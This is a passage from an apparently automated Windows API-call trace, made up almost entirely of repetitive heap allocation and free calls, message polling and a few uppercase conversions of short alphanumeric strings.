lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0195.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0195.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0195.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0195.915] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0195.916] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.916] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0195.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0195.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0195.916] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0195.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.916] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0195.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0195.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0195.917] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0195.917] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0195.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0195.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.918] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0195.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.918] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.918] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0195.919] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0195.919] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0195.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0195.919] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0195.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0195.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0195.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0195.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.920] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0195.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0195.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0195.920] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0195.920] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0195.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0195.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0195.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0195.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0195.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0195.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0195.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0195.922] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0195.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0195.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0195.922] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0195.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0195.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0195.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0195.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0195.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0195.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.923] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0195.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0195.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0195.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0195.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0195.923] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0195.923] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0195.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0195.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0195.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0195.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0195.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0195.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0195.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0195.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0195.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0195.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0195.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0195.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0195.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0195.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0195.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0195.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0195.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0195.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0195.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0195.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0195.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0195.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0195.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0195.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0195.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0195.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0195.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0195.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0195.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.926] RtlAllocateHeap 